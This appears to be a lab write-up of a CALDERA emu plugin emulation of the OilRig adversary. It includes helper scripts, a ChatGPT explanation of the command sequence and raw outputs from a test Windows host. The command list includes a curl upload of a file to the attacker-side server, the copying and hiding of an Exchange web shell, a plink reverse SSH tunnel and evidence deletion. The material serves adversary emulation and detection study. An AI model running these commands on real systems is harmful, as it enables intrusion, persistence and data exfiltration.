curl -s -H "KEY:#{server.api.key}" -H "Content-Type: application/json" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d "{\"watchdog\":1}"
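How a list like the one above can be produced from the jq output, as an added example (my code, not the page's own extraction nor anything shipped with the emu plugin). It walks the adversary object, keeps both `cmd` and `proc` executors (the plink tunnel is a `proc` ability, so a `cmd`-only extraction silently drops it), strips the trailing newline the emu data carries, and lists every `#{fact}` placeholder the sequence needs seeded before an operation can run it. The two abilities embedded as sample input are copied from the jq output above; the array key `abilities` is an assumption about the emu file layout.

```python
import json
import re
import sys

# Fact placeholders that Caldera fills in at run time, e.g. #{second.target.ip}
FACT_RE = re.compile(r"#\{([A-Za-z0-9_.]+)\}")

# Constructed excerpt in the shape of the jq output above: two OilRig abilities,
# one with a "cmd" executor and one with a "proc" executor. The array key
# "abilities" is an assumption about the emu file layout.
SAMPLE_ADVERSARY = {
    "adversary": "OilRig",
    "abilities": [
        {"ability_id": "7aaecfb7-a1eb-477c-8d53-ab3009389623", "platform": "windows",
         "commands": {"cmd": "copy C:\\Users\\Public\\contact.aspx \"\\\\#{second.target.ip}\\C$\\Program Files"
                             "\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\\"\n"},
         "privilege": "Unknown", "tactic": "persistence",
         "technique": "Server Software Component: Web Shell", "attack_id": "T1505.003"},
        {"ability_id": "212995b5-acfc-404b-b3a9-a19cc0afa9a5", "platform": "windows",
         "commands": {"proc": "exec-background C:\\Users\\Public\\Downloads\\plink.exe -no-antispoof -ssh -N "
                              "-R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} "
                              "-pw \"#{caldera.user.password}\" #{caldera.server.ip}\n"},
         "privilege": "Unknown", "tactic": "command-and-control",
         "technique": "Protocol Tunneling", "attack_id": "T1572"},
    ],
}


def extract_commands(adversary, platform="windows"):
    """Return the ordered command list for one adversary object.

    Each ability carries one executor under "commands": "cmd" runs through
    cmd.exe, "proc" launches the binary directly. The executor name is kept
    next to the command text so neither kind is lost.
    """
    rows = []
    for step, ability in enumerate(adversary.get("abilities", []), start=1):
        if ability.get("platform") != platform:
            continue
        for executor, text in (ability.get("commands") or {}).items():
            rows.append({
                "step": step,
                "ability_id": ability.get("ability_id"),
                "executor": executor,
                "command": text.strip(),           # emu data ends each command with "\n"
                "tactic": ability.get("tactic"),
                "attack_id": ability.get("attack_id"),
                "facts": sorted(set(FACT_RE.findall(text))),
            })
    return rows


def required_facts(rows):
    """Every #{fact} the sequence needs before an operation can run it."""
    return sorted({fact for row in rows for fact in row["facts"]})


def secrets_on_command_line(rows):
    """Commands that place a secret-looking fact on the command line.

    Such values end up in process-creation telemetry on the target
    (Sysmon event 1, for instance), which matters when the fact is a real
    credential rather than a lab password.
    """
    return [row["command"] for row in rows
            if any(fact.endswith(("password", "api.key")) for fact in row["facts"])]


if __name__ == "__main__":
    adversary = SAMPLE_ADVERSARY
    if len(sys.argv) > 1:                      # path to a jq-selected adversary object
        with open(sys.argv[1]) as fh:
            adversary = json.load(fh)
    rows = extract_commands(adversary)
    for row in rows:
        print(f"{row['step']:>2} {row['attack_id']:<10} {row['executor']:<4} {row['command']}")
    print("facts needed:", ", ".join(required_facts(rows)))
    print("secrets on command line:", len(secrets_on_command_line(rows)))
```

Against the real file, `python extract.py <(jq '.[] | select(.adversary == "OilRig")' commands-output.json)` feeds the jq selection in through a bash process substitution. The `secrets_on_command_line` check flags the plink step: `caldera.user.password` is passed with `-pw`, so the Caldera host's SSH password is visible in the process command line of every target that runs the ability.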
What does ChatGPT think about this sequence of commands:
The questioning is done at a ChatGPT instance.
Prompt:
The following is a sequence of commands corresponding to the sequence of ability execution for the adversary OilRig in the CALDERA emu plugin. I need you to analyze this sequence, contrast it with your knowledge, and explain to me what the adversary tries to achieve.
Answer:
This sequence of commands for the OilRig adversary in the CALDERA Emu plugin outlines a structured, multi-stage attack, mimicking the behavior of advanced persistent threats (APTs). The commands follow a methodical progression through the stages of a typical kill chain, focusing on information gathering, credential access, persistence, exfiltration, defense evasion, and command-and-control (C2). Here’s an analysis of each step and the adversary’s objectives.
Analysis of Attack Phases and Objectives
1. Discovery Phase (Commands for Reconnaissance on the Host and Network)
The attacker begins by collecting critical information about the environment to understand the target’s layout, users, and network configuration. This reconnaissance phase is essential for planning subsequent steps.
System and User Information:
- cscript /nologo computername.vbs, hostname, systeminfo: Collect the computer’s name, hostname, and system information (T1082).
- cscript /nologo username.vbs, whoami, net user: Identify current and available users on the system and within the local network (T1033, T1087.001).
Network Information:
- ipconfig /all: Retrieves network configuration, showing IP addresses, DNS, and network adapter details (T1016).
- nslookup #{second.target.host}: Resolves domain names to IPs, useful for identifying internal and external hosts (T1018).
- netstat -na: Lists active network connections, giving insight into accessible services and open ports (T1049).
Account and Privilege Information:
- net user /domain, net group /domain, net group "domain admins" /domain, net group "Exchange Trusted Subsystem" /domain: Enumerate domain users and groups, especially privileged ones (T1069.002, T1087.002).
- net accounts /domain: Retrieves domain password policy details (T1201).
- net localgroup administrators: Checks for local administrative privileges (T1069.001).
Running Processes and Services:
- tasklist: Lists active processes, useful for identifying running security services or monitoring tools (T1057).
- sc query: Lists system services, giving insight into important services like antivirus, which might need to be avoided or disabled (T1007).
Registry and Configuration Information:
- reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default": Checks for recent RDP connections, helping assess previous remote access activity and potential lateral movement targets (T1012).
2. Credential Access Phase (Attempt to Steal Credentials)
After gathering basic information, the attacker attempts to access credentials that can be used to escalate privileges or move laterally within the network.
Credential Dumping:
- C:\Users\#{initial.target.user}\AppData\local\SystemFailureReporter\b.exe: Likely a tool or script designed to extract credentials stored in the system’s Credential Manager or other secure locations (T1555.004).
3. Exfiltration Phase (Extracting Information)
This phase involves moving collected data out of the target network to an external server under the attacker’s control.
File Upload:
- curl -F "data=@C:\Users\#{initial.target.user}\AppData\Roaming\fsociety.dat" --header "X-Request-ID: #{initial.target.user}-#{paw}" #{server}/file/upload: Uploads a specified file, potentially containing credentials or sensitive information, to the attacker’s external server (T1041).
4. Persistence Phase (Maintaining Access)
The attacker deploys a web shell on a server directory that allows for remote code execution, ensuring ongoing access to the compromised environment.
Web Shell Deployment:
- copy C:\Users\Public\contact.aspx "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\": Copies a web shell file to an Exchange server directory, allowing the attacker to execute commands remotely by sending HTTP requests to this file (T1505.003).
- attrib +h "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx": Sets the hidden attribute on the web shell file, making it less noticeable on the filesystem (T1564.001).
5. Command-and-Control (C2) Phase (Setting up C2 for Remote Access)
The attacker configures a persistent C2 channel using plink.exe for SSH tunneling, enabling remote control over the target environment. This C2 setup allows the attacker to maintain a foothold and issue commands without being physically present.
Setup SSH Reverse Tunnel:
- copy C:\Users\#{initial.target.user}\AppData\Local\SystemFailureReporter\plink.exe C:\Users\Public\Downloads\plink.exe: Prepares an SSH utility (plink.exe) for tunneling connections.
- exec-background C:\Users\Public\Downloads\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw "#{caldera.user.password}" #{caldera.server.ip}: Establishes an SSH reverse tunnel from the target system to the attacker’s C2 server, allowing remote access to the target’s RDP service (T1572).
6. Defense Evasion Phase (Covering Tracks and Modifying Agent)
The attacker finalizes the intrusion by removing artifacts and modifying the agent’s settings to evade detection and reduce forensic evidence.
Remove Evidence:
- del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;: Deletes evidence of exfiltration files and SSH utilities, ensuring minimal trace of the activity (T1070.004).
Modify Agent for Evasion:
- curl -s -H "KEY:#{server.api.key}" -H "Content-Type: application/json" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d "{\"watchdog\":1}": Sends a request to modify the agent’s settings, possibly extending its lifecycle or reducing logging to evade detection (T1564).
Summary: Adversary’s Objective
The OilRig adversary employs this command sequence to execute a comprehensive attack strategy aimed at infiltration, persistence, and exfiltration while evading detection. The main objectives include:
- Detailed Reconnaissance: Systematically map the system’s resources, users, network, and policies to establish a solid foundation for attack operations.
- Credential Harvesting: Attempt to obtain credentials for privilege escalation or lateral movement.
- Data Exfiltration: Steal specific files from the host and upload them to a remote server, likely containing sensitive data or access credentials.
- Persistence Setup: Deploy a hidden web shell and SSH tunnel to maintain access for future actions without requiring re-entry.
- C2 Channel Establishment: Set up a persistent command-and-control mechanism for issuing commands remotely.
- Evasion and Covering Tracks: Clean up artifacts, hide files, and modify settings to reduce the chance of detection and leave as little evidence as possible.
This strategy reflects a persistent and stealth-focused APT-style attack, closely aligned with real-world tactics used by threat actors aiming to maintain access over extended periods and conduct reconnaissance, data exfiltration, and system compromise while minimizing the likelihood of discovery.
Checking the Caldera Event Logs:
Checking the Caldera Report:
Commands && Outputs
- Running the following script
import json

# Input: the event-log export of the OilRig operation; output: a flat text file
input_file = "Test-OilRig_event-logs.json"
output_file = "Test-OilRig_commands_output.txt"

# Load JSON data from the input file (a list of one object per executed link)
with open(input_file, 'r') as file:
    data = json.load(file)

# Extract command and output fields for each JSON object
results = []
for obj in data:
    command = obj.get("command", "N/A")
    output = obj.get("output", {})          # nested dict: stdout / stderr / exit_code
    stdout = output.get("stdout", "N/A")
    stderr = output.get("stderr", "N/A")
    exit_code = output.get("exit_code", "N/A")
    result = f"command: {command}\nstdout: {stdout}\nstderr: {stderr}\nexit code: {exit_code}\n"
    results.append(result)

# Write the results to the output file, one blank line between entries
with open(output_file, 'w') as file:
    for result in results:
        file.write(result + "\n")

print(f"Extracted information saved to {output_file}")
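The script above shows what every ability returned; the added example below (my code, not the page's script nor anything from the Caldera project) turns those returns into a per-technique verdict. The point it makes is visible in the output that follows: every `net ... /domain` command exited with code 2 and Windows error 1355 (ERROR_NO_SUCH_DOMAIN) because windows-server sits in WORKGROUP, so none of the domain-discovery abilities actually produced anything, whatever the planned sequence or the ChatGPT narrative says. The sample event log is constructed in the shape of the export parsed above; the `attack_metadata` block with `tactic` and `technique_id` follows what recent Caldera event-log exports carry and is an assumption to check against your own file.

```python
import json
import re
from collections import defaultdict

# Windows system error codes that `net` commands print to stderr.
# 1355 = ERROR_NO_SUCH_DOMAIN: the host is not joined to a domain (WORKGROUP).
WIN_ERRORS = {1355: "ERROR_NO_SUCH_DOMAIN (host is not domain-joined)"}
ERROR_RE = re.compile(r"System error (\d+) has occurred", re.IGNORECASE)

# Constructed sample in the shape of the export parsed above. The
# attack_metadata block is an assumption about the export format.
SAMPLE_EVENT_LOG = json.dumps([
    {"command": "whoami",
     "output": {"stdout": "windows-server\\administrator", "stderr": "", "exit_code": "0"},
     "attack_metadata": {"tactic": "discovery", "technique_id": "T1033"}},
    {"command": "net group \"domain admins\" /domain",
     "output": {"stdout": "The request will be processed at a domain controller for domain WORKGROUP.",
                "stderr": "System error 1355 has occurred.\r\nThe specified domain either does not exist "
                          "or could not be contacted.",
                "exit_code": "2"},
     "attack_metadata": {"tactic": "discovery", "technique_id": "T1069.002"}},
    {"command": "net accounts /domain",
     "output": {"stdout": "The request will be processed at a domain controller for domain WORKGROUP.",
                "stderr": "System error 1355 has occurred.\r\nThe specified domain either does not exist "
                          "or could not be contacted.",
                "exit_code": "2"},
     "attack_metadata": {"tactic": "discovery", "technique_id": "T1201"}},
    {"command": "net localgroup administrators",
     "output": {"stdout": "Alias name administrators ... The command completed successfully.",
                "stderr": "", "exit_code": 0},
     "attack_metadata": {"tactic": "discovery", "technique_id": "T1069.001"}},
    {"command": "exec-background C:\\Users\\Public\\Downloads\\plink.exe -ssh -N -R ...",
     "output": {},                      # background executor: nothing was collected
     "attack_metadata": {"tactic": "command-and-control", "technique_id": "T1572"}},
])


def normalise(entry):
    """Flatten one event-log object into a record that carries a verdict."""
    output = entry.get("output") or {}
    stderr = output.get("stderr") or ""
    try:
        exit_code = int(output.get("exit_code"))     # exports use "0" (str) or 0 (int)
    except (TypeError, ValueError):
        exit_code = None                             # no output collected for this link
    meta = entry.get("attack_metadata") or {}
    record = {
        "command": entry.get("command", "N/A"),
        "tactic": meta.get("tactic", "unknown"),
        "technique_id": meta.get("technique_id", "unknown"),
        "exit_code": exit_code,
        "reason": "",
    }
    if exit_code == 0:
        record["verdict"] = "ok"
    elif exit_code is None:
        record["verdict"] = "unknown"
    else:
        record["verdict"] = "failed"
        m = ERROR_RE.search(stderr)
        if m:
            code = int(m.group(1))
            record["reason"] = WIN_ERRORS.get(code, f"Windows error {code}")
    return record


def triage(event_log_json):
    """Parse an event-log export (JSON text) into verdict records, in execution order."""
    return [normalise(e) for e in json.loads(event_log_json)]


def technique_coverage(records):
    """Per ATT&CK technique ID: abilities attempted and abilities that succeeded."""
    cov = defaultdict(lambda: {"attempted": 0, "succeeded": 0})
    for r in records:
        cov[r["technique_id"]]["attempted"] += 1
        if r["verdict"] == "ok":
            cov[r["technique_id"]]["succeeded"] += 1
    return dict(cov)


def techniques_that_never_ran(records):
    """Techniques where at least one ability failed and none succeeded."""
    cov = technique_coverage(records)
    failed = {r["technique_id"] for r in records if r["verdict"] == "failed"}
    return sorted(t for t in failed if cov[t]["succeeded"] == 0)


if __name__ == "__main__":
    records = triage(SAMPLE_EVENT_LOG)
    for r in records:
        print(f"{r['verdict']:<8} {r['technique_id']:<10} {r['command'][:60]:<60} {r['reason']}")
    print("techniques that never ran:", techniques_that_never_ran(records))
```

Read the `never ran` list next to the ChatGPT write-up: the domain group and password-policy discovery it credits to OilRig (T1069.002, T1201 and the other `/domain` calls) did not happen on this host, and the `exec-background` link reports no exit code at all, so the tunnel has to be confirmed from the netstat output or the Caldera server side rather than from the event log.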
- We obtain the commands, output (stdout), error (stderr), and exit code:
command: cscript /nologo computername.vbs
stdout: windows-server
stderr:
exit code: 0
command: cscript /nologo username.vbs
stdout: administrator
stderr:
exit code: 0
command: whoami
stdout: windows-server\administrator
stderr:
exit code: 0
command: hostname
stdout: windows-server
stderr:
exit code: 0
command: ipconfig /all
stdout:
Windows IP Configuration
   Host Name . . . . . . . . . . . . : windows-server
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 08-00-27-83-24-CB
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::5588:53e8:2e27:9e65%7(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.1.21(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DHCPv6 IAID . . . . . . . . . . . : 352845863
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2E-9F-1E-ED-08-00-27-83-24-CB
   DNS Servers . . . . . . . . . . . : 8.8.8.8
                                       4.4.4.4
   NetBIOS over Tcpip. . . . . . . . : Enabled
stderr:
exit code: 0
command: net user /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred. The specified domain either does not exist or could not be contacted.
exit code: 2
command: net group /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred. The specified domain either does not exist or could not be contacted.
exit code: 2
command: net group "domain admins" /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred. The specified domain either does not exist or could not be contacted.
exit code: 2
command: net group "Exchange Trusted Subsystem" /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred. The specified domain either does not exist or could not be contacted.
exit code: 2
command: net accounts /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred. The specified domain either does not exist or could not be contacted.
exit code: 2
command: net user
stdout:
User accounts for \\WINDOWS-SERVER
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed successfully.
stderr:
exit code: 0
command: net localgroup administrators
stdout:
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
stderr:
exit code: 0
command: netstat -na
stdout: Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:22 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING TCP 127.0.0.1:6789 0.0.0.0:0 LISTENING TCP 127.0.0.1:6789 127.0.0.1:49718 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49720 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49722 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49724 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49729 ESTABLISHED TCP 127.0.0.1:49718 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49720 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49722 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49724 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49729 127.0.0.1:6789 ESTABLISHED TCP 192.168.1.21:22 192.168.2.101:51596 ESTABLISHED TCP 192.168.1.21:139 0.0.0.0:0 LISTENING TCP 192.168.1.21:49679 192.168.1.201:8220 ESTABLISHED TCP 192.168.1.21:50575 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:56372 142.251.170.94:443 CLOSE_WAIT TCP 192.168.1.21:56582 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57134 192.168.2.200:9200 ESTABLISHED TCP 192.168.1.21:57365 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57369 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57395 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57406 192.168.2.13:8888 TIME_WAIT TCP 192.168.1.21:57416 192.168.2.13:8888 TIME_WAIT TCP 192.168.1.21:57419 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57423 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57428 192.168.2.200:9200 ESTABLISHED TCP 192.168.1.21:57429 192.168.2.200:9200 ESTABLISHED TCP [::]:22 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP 
[::]:5357 [::]:0 LISTENING TCP [::]:5985 [::]:0 LISTENING TCP [::]:47001 [::]:0 LISTENING TCP [::]:49664 [::]:0 LISTENING TCP [::]:49665 [::]:0 LISTENING TCP [::]:49666 [::]:0 LISTENING TCP [::]:49667 [::]:0 LISTENING TCP [::]:49668 [::]:0 LISTENING TCP [::]:49669 [::]:0 LISTENING TCP [::]:49678 [::]:0 LISTENING UDP 0.0.0.0:123 *:* UDP 0.0.0.0:500 *:* UDP 0.0.0.0:3702 *:* UDP 0.0.0.0:3702 *:* UDP 0.0.0.0:4500 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5355 *:* UDP 0.0.0.0:55695 *:* UDP 0.0.0.0:63114 *:* UDP 127.0.0.1:55694 127.0.0.1:55694 UDP 192.168.1.21:137 *:* UDP 192.168.1.21:138 *:* UDP [::]:123 *:* UDP [::]:500 *:* UDP [::]:3702 *:* UDP [::]:3702 *:* UDP [::]:4500 *:* UDP [::]:5353 *:* UDP [::]:5353 *:* UDP [::]:5355 *:* UDP [::]:55696 *:* UDP [::]:63114 *:*
stderr:
exit code: 0
command: tasklist
stdout: Image Name PID Session Name Session# Mem Usage========================= ======== ================ =========== ============System Idle Process 0 Services 0 8 KSystem 4 Services 0 156 KRegistry 124 Services 0 69,096 Ksmss.exe 376 Services 0 1,284 Kcsrss.exe 480 Services 0 6,340 Kcsrss.exe 552 Console 1 6,712 Kwininit.exe 576 Services 0 6,952 Kwinlogon.exe 620 Console 1 11,640 Kservices.exe 696 Services 0 9,340 Klsass.exe 716 Services 0 17,648 Ksvchost.exe 836 Services 0 23,416 Kfontdrvhost.exe 864 Services 0 3,448 Kfontdrvhost.exe 872 Console 1 4,840 Ksvchost.exe 956 Services 0 11,848 Ksvchost.exe 996 Services 0 8,356 Kdwm.exe 436 Console 1 117,536 Ksvchost.exe 780 Services 0 10,080 Ksvchost.exe 1144 Services 0 5,368 Ksvchost.exe 1152 Services 0 12,300 Ksvchost.exe 1204 Services 0 23,484 Ksvchost.exe 1280 Services 0 7,156 Ksvchost.exe 1308 Services 0 7,780 Ksvchost.exe 1316 Services 0 7,476 KVBoxService.exe 1364 Services 0 7,156 Ksvchost.exe 1416 Services 0 11,020 Ksvchost.exe 1448 Services 0 12,864 Ksvchost.exe 1456 Services 0 5,848 Ksvchost.exe 1464 Services 0 7,840 Ksvchost.exe 1472 Services 0 15,608 Ksvchost.exe 1600 Services 0 8,536 Ksvchost.exe 1656 Services 0 10,696 Ksvchost.exe 1708 Services 0 6,084 Ksvchost.exe 1724 Services 0 8,932 Ksvchost.exe 1732 Services 0 8,780 Ksvchost.exe 1788 Services 0 12,668 Ksvchost.exe 1812 Services 0 7,536 Ksvchost.exe 1836 Services 0 16,536 Ksvchost.exe 1976 Services 0 7,756 Ksvchost.exe 2008 Services 0 9,092 Ksvchost.exe 2244 Services 0 6,968 Ksvchost.exe 2348 Services 0 7,172 Ksvchost.exe 2356 Services 0 8,204 Kspoolsv.exe 2416 Services 0 17,292 Ksvchost.exe 2488 Services 0 14,304 Ksvchost.exe 2496 Services 0 31,340 Ksvchost.exe 2512 Services 0 10,832 Ksvchost.exe 2520 Services 0 7,048 Ksvchost.exe 2552 Services 0 6,796 Ksvchost.exe 2572 Services 0 5,668 Ksvchost.exe 2608 Services 0 19,184 Ksvchost.exe 2620 Services 0 7,696 Ksvchost.exe 2672 Services 0 11,848 KSysmon64.exe 2756 Services 0 17,768 Ksvchost.exe 2764 
Services 0 11,692 Kwlms.exe 2828 Services 0 3,608 KMsMpEng.exe 2868 Services 0 56,636 Kelastic-endpoint.exe 2888 Services 0 73,992 Ksvchost.exe 2792 Services 0 8,560 Ksvchost.exe 3128 Services 0 7,120 Ksvchost.exe 3248 Services 0 12,884 Ksvchost.exe 3444 Services 0 9,620 Kelastic-agent.exe 3664 Services 0 43,796 KAggregatorHost.exe 2896 Services 0 4,708 Kagentbeat.exe 4768 Services 0 189,584 Kagentbeat.exe 4776 Services 0 140,600 Kagentbeat.exe 4788 Services 0 131,264 Kagentbeat.exe 4800 Services 0 156,480 Kconhost.exe 4216 Services 0 12,800 Kconhost.exe 4232 Services 0 12,808 Kconhost.exe 4652 Services 0 12,808 Kconhost.exe 3756 Services 0 12,800 Kunsecapp.exe 4860 Services 0 6,788 Kauditbeat.exe 4892 Services 0 53,820 Ksvchost.exe 3144 Services 0 13,688 Ksvchost.exe 1168 Services 0 18,280 Kmsdtc.exe 1664 Services 0 10,872 Ksvchost.exe 4904 Services 0 12,640 Ksvchost.exe 2432 Services 0 14,700 Ksvchost.exe 2600 Services 0 14,288 Ksvchost.exe 4508 Services 0 12,116 Ksihost.exe 2544 Console 1 29,964 Ksvchost.exe 1848 Console 1 15,876 Ksvchost.exe 680 Console 1 29,716 Ktaskhostw.exe 1400 Console 1 12,828 Ksvchost.exe 3340 Services 0 15,204 Ksvchost.exe 4712 Services 0 7,700 Kctfmon.exe 3896 Console 1 20,932 Ksvchost.exe 3028 Services 0 12,652 Ksvchost.exe 5248 Services 0 11,072 Kexplorer.exe 5636 Console 1 154,832 KStartMenuExperienceHost.e 6032 Console 1 66,052 KTextInputHost.exe 6040 Console 1 52,372 KServerManager.exe 6076 Console 1 114,940 KRuntimeBroker.exe 2124 Console 1 21,520 KSearchApp.exe 5244 Console 1 184,396 KRuntimeBroker.exe 6152 Console 1 36,016 KRuntimeBroker.exe 6352 Console 1 22,108 KVBoxTray.exe 6748 Console 1 15,416 Ksvchost.exe 6916 Console 1 17,632 Kdllhost.exe 5620 Console 1 12,504 Ksshd.exe 560 Services 0 7,728 Ksshd.exe 6852 Services 0 8,356 Ksshd.exe 1124 Services 0 8,376 Kconhost.exe 5328 Services 0 5,268 Kcmd.exe 3492 Services 0 4,756 Kpowershell.exe 6576 Services 0 82,768 Kchrome.exe 6976 Console 1 156,840 Kchrome.exe 4324 Console 1 
8,296 Kchrome.exe 7148 Console 1 45,188 Kchrome.exe 3288 Console 1 19,616 Kchrome.exe 5608 Console 1 233,064 Kchrome.exe 1020 Console 1 123,068 Kchrome.exe 2020 Console 1 71,608 Kpowershell.exe 6292 Console 1 105,012 Kconhost.exe 6928 Console 1 23,568 Kchrome.exe 6872 Console 1 61,192 Kchrome.exe 5856 Console 1 31,288 Kcaldera-read-team-agent.e 5568 Console 1 15,400 Kconhost.exe 3180 Console 1 13,864 KShellExperienceHost.exe 136 Console 1 58,456 KRuntimeBroker.exe 3112 Console 1 22,144 Ksvchost.exe 2088 Services 0 8,972 Ksvchost.exe 3024 Services 0 20,464 Ksvchost.exe 1216 Services 0 7,596 KWmiPrvSE.exe 7404 Services 0 23,116 KWmiPrvSE.exe 7924 Services 0 10,416 KWmiPrvSE.exe 1856 Services 0 13,636 Kcmd.exe 7780 Console 1 4,908 Ktasklist.exe 3472 Console 1 9,864 K
stderr:
exit code: 0
command: sc query
stdout: SERVICE_NAME: auditbeatDISPLAY_NAME: auditbeat TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: BFEDISPLAY_NAME: Base Filtering Engine TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: BrokerInfrastructureDISPLAY_NAME: Background Tasks Infrastructure Service TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: camsvcDISPLAY_NAME: Capability Access Manager Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CDPSvcDISPLAY_NAME: Connected Devices Platform Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CoreMessagingRegistrarDISPLAY_NAME: CoreMessaging TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CryptSvcDISPLAY_NAME: Cryptographic Services TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DcomLaunchDISPLAY_NAME: DCOM Server Process Launcher TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DhcpDISPLAY_NAME: DHCP Client TYPE : 30 WIN32 STATE : 4 RUNNING 
